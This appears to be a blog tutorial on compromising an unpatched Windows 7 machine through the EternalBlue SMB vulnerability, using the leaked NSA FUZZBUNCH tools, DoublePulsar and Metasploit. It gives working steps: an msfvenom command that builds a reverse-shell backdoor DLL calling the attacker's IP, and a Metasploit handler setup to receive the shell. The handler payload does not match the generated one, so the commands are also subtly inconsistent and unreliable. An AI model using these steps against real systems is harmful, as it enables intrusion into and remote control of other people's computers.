Introduction
EternalBlue (CVE-2017-0144) is an exploit a vulnerability in Microsoft’s Server Message Block (SMB) protocol, it’s believed to have been developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group on April 2017, and was used as part of the worldwide WannaCry ransomware attack on May 2017.
Exploit Eternalblue vulnerability using NSA’s leaked tools (FUZZBUNCH) and Metasploit framework
April 8 2017, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
FUZZBUNCH is a NSA’s exploit framework like Metasploit.
In this tutorial we will use FUZZBUNCH to checking for vulnerable to eternalblue, inject and execute payload into victim, then use Metasploit’s Meterpreter to compromise victim machine.
1. Setting up FUZZBUNCH
Requirements:
- Python 2.6: https://www.python.org/download/releases/2.6/
- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
- Target machine: Windows 7
- Attacker machine 1: Windows 7 with FUZZBUNCH
- Attacker machine 2: Kali linux with metasploit framework
Dowload NSA’tool, move to the folder shadowbrokermaster/Windows), then open and configuration the “ResourcesDir” and “LogDir” in the Fuzzbunch.xml file like following:
Comment the fllowing command in fb.py (line number 72), because inside the leak have no module named is “ListeningPost”. If we use this command, an error will happening when execute fb.py file.
# addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
2. Checking for vulnerable to Eternalblue
Execute the fb.py file by enter command “python fb.py”
Enter target Ip and callback ip address(attacker ip address)
We’ll use by default configurations in every parameter:
Except at the following, we need to change mode to “1”:
Finally, if target vulnerable to eternalblue we should see the message “Eternalblue Succeeded”
3. Generate payload with msfvenom
Generate payload by enter following command in kali terminal:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.28.140 -b "\x00" LPORT=4444 -f dll -o /root/eternalblue/backdoor.dll
4. Start metasploit exploit/multi/handler
In attacker machine type following command to use metasploit to handl the payload we have send before.
use exploit/multi/handler set payload windows/meterpreter/reverse_https set lhost 192.168.28.140 set lport 4444 run
5. Send and execute payload on target using DoublePulsar in NSA leaked tools
The next step is to run DoublePulsar and inject the malicious backdoor.dll file. Enter the command “use DoublePulsar” in FUZZBUNCH to use DoublePulsar:
Configuration the targets ip address, port, protocol, OS architecture, path to dll backdoor file …
If successful to send the payload to victim ,output should like as following:
5. Compromised target using Meterpreter shell in Metasploit
Backdoor already running on target, when we switch back to Metasploit again we should have received a Meterpreter shell:
References
https://www.exploit-db.com/docs/41896.pdf
https://cysinfo.com/wp-content/uploads/2017/04/Shadow_release_updated.pdf
https://community.rapid7.com/community/metasploit/blog/2017/05/17/metasploit-the-power-of-the-community-and-eternalblue
https://en.wikipedia.org/wiki/EternalBlue